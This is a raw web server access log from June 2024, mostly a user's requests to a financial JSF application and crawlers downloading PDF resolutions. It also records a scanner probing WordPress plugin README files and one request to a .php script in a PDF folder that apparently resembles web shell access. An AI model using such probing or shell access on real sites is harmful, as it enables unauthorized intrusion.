181.53.14.143 - - [22/Jun/2024:12:01:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 36091
23.22.35.162 - - [22/Jun/2024:12:01:37 -0500] "GET /BLA/resoluciones/AUTOS%202018/0986.pdf HTTP/1.1" 200 356289
47.128.39.24 - - [22/Jun/2024:12:01:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2570.pdf HTTP/1.1" 200 2739
181.53.14.143 - - [22/Jun/2024:12:01:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1436
181.53.14.143 - - [22/Jun/2024:12:01:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1436
181.53.14.143 - - [22/Jun/2024:12:01:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1444
181.53.14.143 - - [22/Jun/2024:12:01:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 2733
181.53.14.143 - - [22/Jun/2024:12:01:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 40841
181.53.14.143 - - [22/Jun/2024:12:01:40 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:40 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.53.14.143 - - [22/Jun/2024:12:01:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34133
181.53.14.143 - - [22/Jun/2024:12:01:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34133
181.53.14.143 - - [22/Jun/2024:12:01:41 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34133
23.22.35.162 - - [22/Jun/2024:12:01:42 -0500] "GET /BLA/resoluciones/AUTOS%202019/2541.pdf HTTP/1.1" 200 257062
51.222.44.188 - - [22/Jun/2024:12:01:45 -0500] "GET /wp-content/plugins/nav-menu-roles/README.txt HTTP/1.1" 404 1032
181.53.14.143 - - [22/Jun/2024:12:01:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12831
3.224.220.101 - - [22/Jun/2024:12:01:46 -0500] "GET /BLA/resoluciones/AUTOS%202018/0418.pdf HTTP/1.1" 200 322275
51.222.44.188 - - [22/Jun/2024:12:01:47 -0500] "GET /wp-content/plugins/feeds-for-youtube/README.txt HTTP/1.1" 404 1032
181.53.14.143 - - [22/Jun/2024:12:01:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 161979
181.53.14.143 - - [22/Jun/2024:12:01:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:49 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
